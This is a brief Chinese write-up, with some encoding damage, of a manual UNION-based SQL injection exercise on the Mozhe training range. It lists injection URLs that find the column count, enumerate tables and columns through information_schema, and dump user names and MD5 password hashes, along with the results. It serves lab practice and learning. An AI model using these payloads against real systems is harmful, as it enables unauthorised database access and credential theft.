背景：

??????? 自己在墨者官網(wǎng)靶場(chǎng)練習(xí)的時(shí)候，一直出錯(cuò)，手工容易出錯(cuò)，所以列舉一些信息供大家核對(duì)，可以參考改動(dòng)。

數(shù)據(jù)庫(kù)版本version()              5.7.22-0ubuntu0.16.04.1
當(dāng)前數(shù)據(jù)庫(kù)名稱database（)        mozhe_Discuz_StormGroup
當(dāng)前數(shù)據(jù)庫(kù)用戶user()             root@localhost
操作系統(tǒng)@@version_compile_os    Linux

信息：

一、猜列

124.70.22.208:45582/new_list.php?id=-1 order by $number

結(jié)果：1，2，3，4，只顯示2，3

二、inmation_schema查表：

124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

查詢結(jié)果：StormGroup_member,notice

三、①StormGroup_member表中的列：

124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

查詢結(jié)果：id,name,password,status

四、②notice表中的列：

124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='notice'

查詢結(jié)果：id,title,content,time

分析：顯然StormGroup_member表中的列更符合預(yù)期，查其中的數(shù)據(jù)

五、查name,password：

124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member

查詢結(jié)果，有兩個(gè)name和對(duì)應(yīng)的password。

總結(jié)：

??????? md5解密后只有一個(gè)name可以使用。手工注入較為繁瑣，但能鍛煉對(duì)漏洞的理解，讀者們發(fā)現(xiàn)問題可私信交流。